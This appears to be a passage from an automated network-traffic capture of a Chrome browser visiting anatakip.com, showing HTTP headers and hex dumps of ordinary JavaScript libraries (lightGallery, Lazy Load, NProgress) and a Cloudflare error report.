                    2024-05-26 22:57:35 UTC1369INData Raw: 70 6f 73 74 65 72 29 2c 6b 3d 6c 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 63 5d 2e 68 74 6d 6c 2c 67 3d 6c 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 63 5d 2e 73 72 63 2c 6c 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 63 5d 2e 72 65 73 70 6f 6e 73 69 76 65 29 7b 76 61 72 20 6f 3d 6c 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 63 5d 2e 72 65 73 70 6f 6e 73 69 76 65 2e 73 70 6c 69 74 28 22 2c 22 29 3b 6e 28 6f 29 7d 69 3d 6c 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 63 5d 2e 73 72 63 73 65 74 2c 6a 3d 6c 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 63 5d 2e 73 69 7a 65 73 7d 65 6c 73 65 7b 69 66 28 6c 2e 24 69 74 65 6d 73 2e 65 71 28 63 29 2e 61 74 74 72 28 22 64 61 74 61 2d 70 6f 73 74 65 72 22 29 26 26 28 6d 3d 21 30 2c 68 3d 6c 2e 24 69 74 65 6d 73 2e 65 71 28 63 29 2e 61 74 74
                    Data Ascii: poster),k=l.s.dynamicEl[c].html,g=l.s.dynamicEl[c].src,l.s.dynamicEl[c].responsive){var o=l.s.dynamicEl[c].responsive.split(",");n(o)}i=l.s.dynamicEl[c].srcset,j=l.s.dynamicEl[c].sizes}else{if(l.$items.eq(c).attr("data-poster")&&(m=!0,h=l.$items.eq(c).att
                    2024-05-26 22:57:35 UTC1369INData Raw: 69 76 20 63 6c 61 73 73 3d 22 6c 67 2d 69 6d 67 2d 77 72 61 70 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 67 2d 6f 62 6a 65 63 74 20 6c 67 2d 69 6d 61 67 65 22 20 73 72 63 3d 22 27 2b 67 2b 27 22 20 2f 3e 3c 2f 64 69 76 3e 27 29 3b 69 66 28 6c 2e 24 65 6c 2e 74 72 69 67 67 65 72 28 22 6f 6e 41 66 65 72 41 70 70 65 6e 64 53 6c 69 64 65 2e 6c 67 22 2c 5b 63 5d 29 2c 66 3d 6c 2e 24 73 6c 69 64 65 2e 65 71 28 63 29 2e 66 69 6e 64 28 22 2e 6c 67 2d 6f 62 6a 65 63 74 22 29 2c 6a 26 26 66 2e 61 74 74 72 28 22 73 69 7a 65 73 22 2c 6a 29 2c 69 29 7b 66 2e 61 74 74 72 28 22 73 72 63 73 65 74 22 2c 69 29 3b 74 72 79 7b 70 69 63 74 75 72 65 66 69 6c 6c 28 7b 65 6c 65 6d 65 6e 74 73 3a 5b 66 5b 30 5d 5d 7d 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 65
                    Data Ascii: iv class="lg-img-wrap"><img class="lg-object lg-image" src="'+g+'" /></div>');if(l.$el.trigger("onAferAppendSlide.lg",[c]),f=l.$slide.eq(c).find(".lg-object"),j&&f.attr("sizes",j),i){f.attr("srcset",i);try{picturefill({elements:[f[0]]})}catch(t){console.e
                    2024-05-26 22:57:35 UTC1369INData Raw: 73 28 22 6c 67 2d 68 69 64 65 2d 64 6f 77 6e 6c 6f 61 64 22 29 29 3a 66 2e 24 6f 75 74 65 72 2e 61 64 64 43 6c 61 73 73 28 22 6c 67 2d 68 69 64 65 2d 64 6f 77 6e 6c 6f 61 64 22 29 7d 69 66 28 74 68 69 73 2e 24 65 6c 2e 74 72 69 67 67 65 72 28 22 6f 6e 42 65 66 6f 72 65 53 6c 69 64 65 2e 6c 67 22 2c 5b 65 2c 62 2c 63 2c 64 5d 29 2c 66 2e 6c 67 42 75 73 79 3d 21 30 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 66 2e 68 69 64 65 42 61 72 74 69 6d 65 6f 75 74 29 2c 22 2e 6c 67 2d 73 75 62 2d 68 74 6d 6c 22 3d 3d 3d 74 68 69 73 2e 73 2e 61 70 70 65 6e 64 53 75 62 48 74 6d 6c 54 6f 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 2e 61 64 64 48 74 6d 6c 28 62 29 7d 2c 68 29 2c 74 68 69 73 2e 61 72 72 6f 77 44 69 73 61 62 6c 65 28 62 29 2c
                    Data Ascii: s("lg-hide-download")):f.$outer.addClass("lg-hide-download")}if(this.$el.trigger("onBeforeSlide.lg",[e,b,c,d]),f.lgBusy=!0,clearTimeout(f.hideBartimeout),".lg-sub-html"===this.s.appendSubHtmlTo&&setTimeout(function(){f.addHtml(b)},h),this.arrowDisable(b),
                    2024-05-26 22:57:35 UTC1369INData Raw: 78 74 53 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 3b 62 2e 6c 67 42 75 73 79 7c 7c 28 62 2e 69 6e 64 65 78 2b 31 3c 62 2e 24 73 6c 69 64 65 2e 6c 65 6e 67 74 68 3f 28 62 2e 69 6e 64 65 78 2b 2b 2c 62 2e 24 65 6c 2e 74 72 69 67 67 65 72 28 22 6f 6e 42 65 66 6f 72 65 4e 65 78 74 53 6c 69 64 65 2e 6c 67 22 2c 5b 62 2e 69 6e 64 65 78 5d 29 2c 62 2e 73 6c 69 64 65 28 62 2e 69 6e 64 65 78 2c 61 2c 21 31 29 29 3a 62 2e 73 2e 6c 6f 6f 70 3f 28 62 2e 69 6e 64 65 78 3d 30 2c 62 2e 24 65 6c 2e 74 72 69 67 67 65 72 28 22 6f 6e 42 65 66 6f 72 65 4e 65 78 74 53 6c 69 64 65 2e 6c 67 22 2c 5b 62 2e 69 6e 64 65 78 5d 29 2c 62 2e 73 6c 69 64 65 28 62 2e 69 6e 64 65 78 2c 61 2c 21 31 29 29 3a 62 2e 73 2e 73 6c 69 64 65 45 6e 64 41 6e
                    Data Ascii: xtSlide=function(a){var b=this;b.lgBusy||(b.index+1<b.$slide.length?(b.index++,b.$el.trigger("onBeforeNextSlide.lg",[b.index]),b.slide(b.index,a,!1)):b.s.loop?(b.index=0,b.$el.trigger("onBeforeNextSlide.lg",[b.index]),b.slide(b.index,a,!1)):b.s.slideEndAn


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.549733104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC627OUTGET /assets/lightgallery/dist/js/lg-video.min.js HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:35 UTC776INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: application/javascript
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 09:03:20 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 309254
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0pZetXqMBW6R0k7F1ivm3QwnP%2Bx5kXeaMWkG%2FzScgzbUz9SSys00pFMoTnkCA1BUB3rW2a7%2BY0mpocElMRS3thkKzTJZL%2B4UyvaQV4Hj8MAdZKhRbVYHUT5KlvRi%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d717db78c05-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC593INData Raw: 31 35 35 61 0d 0a 2f 2a 21 20 6c 69 67 68 74 67 61 6c 6c 65 72 79 20 2d 20 76 31 2e 32 2e 32 31 20 2d 20 32 30 31 36 2d 30 36 2d 32 38 0d 0a 2a 20 68 74 74 70 3a 2f 2f 73 61 63 68 69 6e 63 68 6f 6f 6c 75 72 2e 67 69 74 68 75 62 2e 69 6f 2f 6c 69 67 68 74 47 61 6c 6c 65 72 79 2f 0d 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 53 61 63 68 69 6e 20 4e 3b 20 4c 69 63 65 6e 73 65 64 20 41 70 61 63 68 65 20 32 2e 30 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 76 69 64 65 6f 4d 61 78 57 69 64 74 68 3a 22 38 35 35 70 78 22 2c 79 6f 75 74 75 62 65 50 6c 61 79 65 72 50 61 72 61 6d 73 3a 21 31 2c 76 69 6d 65 6f 50 6c 61 79 65 72 50 61 72 61 6d 73 3a 21 31 2c
                    Data Ascii: 155a/*! lightgallery - v1.2.21 - 2016-06-28* http://sachinchoolur.github.io/lightGallery/* Copyright (c) 2016 Sachin N; Licensed Apache 2.0 */!function(a,b,c,d){"use strict";var e={videoMaxWidth:"855px",youtubePlayerParams:!1,vimeoPlayerParams:!1,
                    2024-05-26 22:57:35 UTC1369INData Raw: 28 22 2e 6c 67 2d 76 69 64 65 6f 22 29 2e 61 70 70 65 6e 64 28 62 2e 6c 6f 61 64 56 69 64 65 6f 28 64 2c 22 6c 67 2d 6f 62 6a 65 63 74 22 2c 21 30 2c 63 2c 65 29 29 2c 65 29 69 66 28 62 2e 63 6f 72 65 2e 73 2e 76 69 64 65 6f 6a 73 29 74 72 79 7b 76 69 64 65 6f 6a 73 28 62 2e 63 6f 72 65 2e 24 73 6c 69 64 65 2e 65 71 28 63 29 2e 66 69 6e 64 28 22 2e 6c 67 2d 68 74 6d 6c 35 22 29 2e 67 65 74 28 30 29 2c 62 2e 63 6f 72 65 2e 73 2e 76 69 64 65 6f 6a 73 4f 70 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 76 69 64 65 6f 4c 6f 61 64 65 64 7c 7c 74 68 69 73 2e 70 6c 61 79 28 29 7d 29 7d 63 61 74 63 68 28 66 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 68 61 76 65 20 69 6e 63 6c 75 64 65 64 20 76 69 64 65
                    Data Ascii: (".lg-video").append(b.loadVideo(d,"lg-object",!0,c,e)),e)if(b.core.s.videojs)try{videojs(b.core.$slide.eq(c).find(".lg-html5").get(0),b.core.s.videojsOptions,function(){b.videoLoaded||this.play()})}catch(f){console.error("Make sure you have included vide
                    2024-05-26 22:57:35 UTC1369INData Raw: 65 2e 73 2e 76 69 64 65 6f 6a 73 4f 70 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 6c 61 79 28 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 68 61 76 65 20 69 6e 63 6c 75 64 65 64 20 76 69 64 65 6f 6a 73 22 29 7d 65 6c 73 65 20 62 2e 63 6f 72 65 2e 24 73 6c 69 64 65 2e 65 71 28 62 2e 63 6f 72 65 2e 69 6e 64 65 78 29 2e 66 69 6e 64 28 22 2e 6c 67 2d 68 74 6d 6c 35 22 29 2e 67 65 74 28 30 29 2e 70 6c 61 79 28 29 7d 3b 62 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 3f 28 68 3d 62 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 62 2e 63 6f 72 65 2e 69 6e 64 65 78 5d 2e 73 72 63 2c 69 3d 62 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 62 2e
                    Data Ascii: e.s.videojsOptions,function(){this.play()})}catch(e){console.error("Make sure you have included videojs")}else b.core.$slide.eq(b.core.index).find(".lg-html5").get(0).play()};b.core.s.dynamic?(h=b.core.s.dynamicEl[b.core.index].src,i=b.core.s.dynamicEl[b.
                    2024-05-26 22:57:35 UTC1369INData Raw: 73 74 4d 65 73 73 61 67 65 28 22 70 61 75 73 65 22 2c 22 2a 22 29 3b 65 6c 73 65 20 69 66 28 6b 29 69 66 28 62 2e 63 6f 72 65 2e 73 2e 76 69 64 65 6f 6a 73 29 74 72 79 7b 76 69 64 65 6f 6a 73 28 6b 29 2e 70 61 75 73 65 28 29 7d 63 61 74 63 68 28 6c 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 68 61 76 65 20 69 6e 63 6c 75 64 65 64 20 76 69 64 65 6f 6a 73 22 29 7d 65 6c 73 65 20 6b 2e 70 61 75 73 65 28 29 3b 6a 26 26 61 28 6a 29 2e 61 74 74 72 28 22 73 72 63 22 2c 61 28 6a 29 2e 61 74 74 72 28 22 73 72 63 22 29 2e 72 65 70 6c 61 63 65 28 22 26 61 75 74 6f 70 6c 61 79 22 2c 22 26 6e 6f 70 6c 61 79 22 29 29 3b 76 61 72 20 6d 3b 6d 3d 62 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 3f 62 2e 63 6f 72 65 2e 73 2e
                    Data Ascii: stMessage("pause","*");else if(k)if(b.core.s.videojs)try{videojs(k).pause()}catch(l){console.error("Make sure you have included videojs")}else k.pause();j&&a(j).attr("src",a(j).attr("src").replace("&autoplay","&noplay"));var m;m=b.core.s.dynamic?b.core.s.
                    2024-05-26 22:57:35 UTC774INData Raw: 6c 61 79 3d 22 2b 68 2b 22 26 61 70 69 3d 70 6f 73 74 4d 65 73 73 61 67 65 22 2c 74 68 69 73 2e 63 6f 72 65 2e 73 2e 64 61 69 6c 79 6d 6f 74 69 6f 6e 50 6c 61 79 65 72 50 61 72 61 6d 73 26 26 28 69 3d 69 2b 22 26 22 2b 61 2e 70 61 72 61 6d 28 74 68 69 73 2e 63 6f 72 65 2e 73 2e 64 61 69 6c 79 6d 6f 74 69 6f 6e 50 6c 61 79 65 72 50 61 72 61 6d 73 29 29 2c 67 3d 27 3c 69 66 72 61 6d 65 20 63 6c 61 73 73 3d 22 6c 67 2d 76 69 64 65 6f 2d 6f 62 6a 65 63 74 20 6c 67 2d 64 61 69 6c 79 6d 6f 74 69 6f 6e 20 27 2b 63 2b 27 22 20 77 69 64 74 68 3d 22 35 36 30 22 20 68 65 69 67 68 74 3d 22 33 31 35 22 20 73 72 63 3d 22 2f 2f 77 77 77 2e 64 61 69 6c 79 6d 6f 74 69 6f 6e 2e 63 6f 6d 2f 65 6d 62 65 64 2f 76 69 64 65 6f 2f 27 2b 6a 2e 64 61 69 6c 79 6d 6f 74 69 6f 6e 5b
                    Data Ascii: lay="+h+"&api=postMessage",this.core.s.dailymotionPlayerParams&&(i=i+"&"+a.param(this.core.s.dailymotionPlayerParams)),g='<iframe class="lg-video-object lg-dailymotion '+c+'" width="560" height="315" src="//www.dailymotion.com/embed/video/'+j.dailymotion[
                    2024-05-26 22:57:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.549732104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC622OUTGET /assets/lazyload/jquery.lazyload.min.js HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:35 UTC774INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: application/javascript
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 11:17:08 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 301226
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=laN%2B91EsdYP4gjac1kLdadE1ztFNdeSU4alWP8zUtsBKSANUzCNFFl1AzqTWD3J%2FQ7o%2FpPbHCKvU%2BFylaVJvJWjgas3oPFNVPBvY5E08H7uR7BAPxso2GUDrfbnUNpY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d717a664255-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC595INData Raw: 64 33 36 0d 0a 2f 2a 21 20 4c 61 7a 79 20 4c 6f 61 64 20 31 2e 39 2e 37 20 2d 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 2d 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 30 2d 32 30 31 35 20 4d 69 6b 61 20 54 75 75 70 6f 6c 61 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 61 28 62 29 3b 61 2e 66 6e 2e 6c 61 7a 79 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 76 61 72 20 62 3d 30 3b 69 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 61 28 74 68 69 73 29 3b 69 66 28 21 6a 2e 73 6b 69 70 5f 69 6e 76 69 73 69 62 6c 65 7c 7c 63 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 29 69 66 28 61 2e 61 62 6f 76 65 74 68 65 74 6f 70 28 74 68 69 73 2c 6a 29 7c 7c 61 2e 6c
                    Data Ascii: d36/*! Lazy Load 1.9.7 - MIT license - Copyright 2010-2015 Mika Tuupola */!function(a,b,c,d){var e=a(b);a.fn.lazyload=function(f){function g(){var b=0;i.each(function(){var c=a(this);if(!j.skip_invisible||c.is(":visible"))if(a.abovethetop(this,j)||a.l
                    2024-05-26 22:57:35 UTC1369INData Raw: 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 59 41 41 41 41 66 46 63 53 4a 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 51 41 41 41 37 45 41 5a 55 72 44 68 73 41 41 41 41 4e 53 55 52 42 56 42 68 58 59 7a 68 38 2b 50 42 2f 41 41 66 66 41 30 6e 4e 50 75 43 4c 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 7d 3b 72 65 74 75 72 6e 20 66 26 26 28 64 21 3d 3d 66 2e 66 61 69 6c 75 72 65 6c 69 6d 69 74 26 26 28 66 2e 66 61 69 6c 75 72 65 5f 6c 69 6d 69 74 3d 66 2e 66 61 69 6c 75 72 65 6c 69 6d 69 74 2c 64 65 6c 65 74 65 20 66 2e 66 61 69 6c 75 72 65 6c 69 6d 69 74 29 2c 64 21 3d 3d 66 2e 65 66 66 65 63 74 73 70 65 65 64 26 26 28 66 2e
                    Data Ascii: SUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"};return f&&(d!==f.failurelimit&&(f.failure_limit=f.failurelimit,delete f.failurelimit),d!==f.effectspeed&&(f.
                    2024-05-26 22:57:35 UTC1369INData Raw: 28 63 2c 66 29 7b 76 61 72 20 67 3b 72 65 74 75 72 6e 20 67 3d 66 2e 63 6f 6e 74 61 69 6e 65 72 3d 3d 3d 64 7c 7c 66 2e 63 6f 6e 74 61 69 6e 65 72 3d 3d 3d 62 3f 28 62 2e 69 6e 6e 65 72 48 65 69 67 68 74 3f 62 2e 69 6e 6e 65 72 48 65 69 67 68 74 3a 65 2e 68 65 69 67 68 74 28 29 29 2b 65 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3a 61 28 66 2e 63 6f 6e 74 61 69 6e 65 72 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2b 61 28 66 2e 63 6f 6e 74 61 69 6e 65 72 29 2e 68 65 69 67 68 74 28 29 2c 67 3c 3d 61 28 63 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 66 2e 74 68 72 65 73 68 6f 6c 64 7d 2c 61 2e 72 69 67 68 74 6f 66 66 6f 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 66 29 7b 76 61 72 20 67 3b 72 65 74 75 72 6e 20 67 3d 66 2e 63 6f 6e 74 61 69 6e 65 72 3d 3d 3d 64 7c 7c
                    Data Ascii: (c,f){var g;return g=f.container===d||f.container===b?(b.innerHeight?b.innerHeight:e.height())+e.scrollTop():a(f.container).offset().top+a(f.container).height(),g<=a(c).offset().top-f.threshold},a.rightoffold=function(c,f){var g;return g=f.container===d||
                    2024-05-26 22:57:35 UTC56INData Raw: 68 74 6f 66 66 6f 6c 64 28 62 2c 7b 74 68 72 65 73 68 6f 6c 64 3a 30 7d 29 7d 7d 29 7d 28 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b 0d 0a
                    Data Ascii: htoffold(b,{threshold:0})}})}(jQuery,window,document);
                    2024-05-26 22:57:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.54973435.190.80.14433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC476OUTPOST /report/v4?s=MSO4u6hhEz8Hcno9nmUVRoQV5Qx3caGuGDqr6nuFxeLRl3IERZafoidcDHs62aIt1%2BPR7owy2Rj94S%2BN%2FWaHXLGCtf3ilabN1y8GWxzZChXxA2zGh%2FsaQuA76w9pEhk%3D HTTP/1.1
                    Host: a.nel.cloudflare.com
                    Connection: keep-alive
                    Content-Length: 422
                    Content-Type: application/reports+json
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:34 UTC422OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 39 36 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6e 61 74 61 6b 69 70 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 37 2e 38 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70
                    Data Ascii: [{"age":1,"body":{"elapsed_time":962,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://anatakip.com/","sampling_fraction":1.0,"server_ip":"104.21.27.83","status_code":404,"type":"http.error"},"type":"network-error","url":"http
                    2024-05-26 22:57:35 UTC168INHTTP/1.1 200 OK
                    content-length: 0
                    date: Sun, 26 May 2024 22:57:34 GMT
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.549731104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC613OUTGET /assets/nprogress/nprogress.js HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:35 UTC831INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: application/javascript
                    Content-Length: 6333
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=12041
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 11:17:08 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 301226
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v0WyOvgrOChyKvASc%2BL3uF5uOisu4M49tLL9IAKMM3AMd%2FSclMUFKwkJm6jFR6Dej7ZDFyW3LY3No9hEw5yUpHiJMVsPN3b03dPnF6Rf6XpRrjTyOnP7I7JAP9QpdxY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d71af04c328-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC538INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 72 6f 6f 74 2c 66 61 63 74 6f 72 79 29 7b 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 7b 64 65 66 69 6e 65 28 66 61 63 74 6f 72 79 29 3b 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3d 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 66 61 63 74 6f 72 79 28 29 3b 7d 65 6c 73 65 7b 72 6f 6f 74 2e 4e 50 72 6f 67 72 65 73 73 3d 66 61 63 74 6f 72 79 28 29 3b 7d 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4e 50 72 6f 67 72 65 73 73 3d 7b 7d 3b 4e 50 72 6f 67 72 65 73 73 2e 76 65 72 73 69 6f 6e 3d 27 30 2e 32 2e 30 27 3b 76 61 72 20 53 65 74 74 69 6e 67 73 3d 4e 50 72
                    Data Ascii: ;(function(root,factory){if(typeof define==='function'&&define.amd){define(factory);}else if(typeof exports==='object'){module.exports=factory();}else{root.NProgress=factory();}})(this,function(){var NProgress={};NProgress.version='0.2.0';var Settings=NPr
